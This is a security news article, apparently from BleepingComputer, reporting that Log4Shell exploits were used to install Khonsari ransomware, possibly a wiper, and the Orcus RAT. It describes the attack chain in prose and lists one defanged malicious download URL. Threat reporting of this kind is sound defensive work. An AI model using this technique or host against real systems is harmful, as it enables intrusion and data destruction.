Microsoft December 2021 Patch Tuesday fixes 6 zero-days, 67 flaws
Bugs in billions of WiFi, Bluetooth chips allow password, data theft
Log4j: List of vulnerable products and vendor advisories
Microsoft fixes Windows AppX Installer zero-day used by Emotet
State-sponsored hackers abuse Slack API to steal airline data
AWS down again, outage impacts Twitch, Zoom, PSN, Hulu, others
Log4j vulnerability now used by state-backed hackers, access brokers
Microsoft fixes bug blocking Defender for Endpoint on Windows Server
Qualys BrowserCheck
Junkware Removal Tool
How to remove the PBlock+ adware browser extension
Remove the Search Redirect
Remove the Search Redirect
Remove the Search Redirect
Remove Security Tool and SecurityTool (Uninstall Guide)
How to remove Antivirus 2009 (Uninstall Instructions)
How to Remove WinFixer / Virtumonde / Msevents / Trojan.vundo
How to remove Google Redirects or the TDSS, TDL3, or Alureon rootkit using TDSSKiller
Locky Ransomware Information, Help Guide, and FAQ
CryptoLocker Ransomware Information Guide and FAQ
CryptorBit and HowDecrypt Information Guide and FAQ
CryptoDefense and How_Decrypt Ransomware Information Guide and FAQ
How to make the Start menu full screen in Windows 10
How to install the Microsoft Visual C++ 2015 Runtime
How to open an elevated PowerShell Admin prompt in Windows 10
How to Translate a Web Page in Google Chrome
How to start Windows in Safe Mode
How to remove a Trojan, Virus, Worm, or other Malware
How to show hidden files in Windows 7
How to see hidden files in Windows
IT Certification Courses
Gear + Gadgets
The first public case of the Log4j Log4Shell vulnerability used to download and install ransomware has been discovered by researchers.
Last Friday, a public exploit was released for a critical zero-day vulnerability named ‘Log4Shell’ in the Apache Log4j Java-based logging platform. Log4j is a development framework that allows developers to add error and event logging into their Java applications.
The vulnerability allows threat actors to create special JNDI strings that, when read by Log4j, cause the platform to connect to and execute code at the included URL. This allows attackers to easily detect vulnerable devices or execute code supplied by a remote site or via Base64 encoded strings.
While this vulnerability was fixed in Log4j 2.15.0 and even tightened further in Log4j 2.16.0, it is being widely exploited by threat actors to install various malware, including coin miners, botnets, and even Cobalt Strike beacons.
Yesterday, BitDefender reported that they found the first ransomware family being installed directly via Log4Shell exploits.
The exploit downloads a Java class from hxxp://3.145.115[.]94/Main.class that is loaded and executed by the Log4j application.
Once loaded, it would download a .NET binary from the same server to install new ransomware [VirusTotal] named ‘Khonsari.’
This same name is also used as a the extension for encrypted files and in the ransom note, as shown below.
In later attacks, BitDefender noticed that this threat actor used the same server to distribute the Orcus Remote Access Trojan.
Ransomware expert Michael Gillespie told BleepingComputer that Khonsari uses valid encryption and is secure, meaning that it is not possible to recover files for free.
However, the ransom note has one oddity – it does not appear to include a way to contact the threat actor to pay a ransom.
Emsisoft analyst Brett Callow pointed out to BleepingComputer that the ransomware is named after and uses contact information for a Louisiana antique shop owner rather than the threat actor.
Therefore, it is unclear if that person is the actual victim of the ransomware attack or listed as a decoy.
Regardless of the reason, as it does not contain legitimate contact information for the threat actors, we believe this is a wiper rather than ransomware.
While this may be the first known instance of the Log4j exploit directly installing ransomware (wiper?), Microsoft has already seen the exploits used to deploy Cobalt Strike beacons.
Therefore, it is likely that more advanced ransomware operations are already using the exploits as part of their attacks.
Hackers start pushing malware in worldwide Log4Shell attacks
Log4j: List of vulnerable products and vendor advisories
Researchers release ‘vaccine’ for critical Log4Shell vulnerability
New Cerber ransomware targets Confluence and GitLab servers
Magniber ransomware gang now exploits Internet Explorer flaws in attacks
Not a member yet? Register Now
Bugs in billions of WiFi, Bluetooth chips allow password, data theft
Kronos ransomware attack may cause weeks of HR solutions downtime
To receive periodic updates and news from BleepingComputer, please use the form below.
Terms of Use Privacy PolicyEthics Statement
Copyright @ 2003 – 2021 Bleeping Computer® LLC – All Rights Reserved
Not a member yet? Register Now
Read our posting guidelinese to learn what content is prohibited.


You May Also Like

Microsoft patches Excel zero-day used in attacks, asks Mac users to wait

HPE says hackers breached Aruba Central using stolen access keyFBI warns of…

Mozilla Thunderbird 91.3 released to fix high impact flaws

Ukraine links members of Gamaredon hacker group to Russian FSBSamsung Galaxy S21…

Amazon explains the cause behind Tuesday’s massive AWS outage

New zero-day exploit for Log4j Java library is an enterprise nightmareALPHV BlackCat…

800K WordPress sites still impacted by critical SEO plugin flaw

Russian hackers made millions by stealing SEC earning reportsThreat actors steal $80…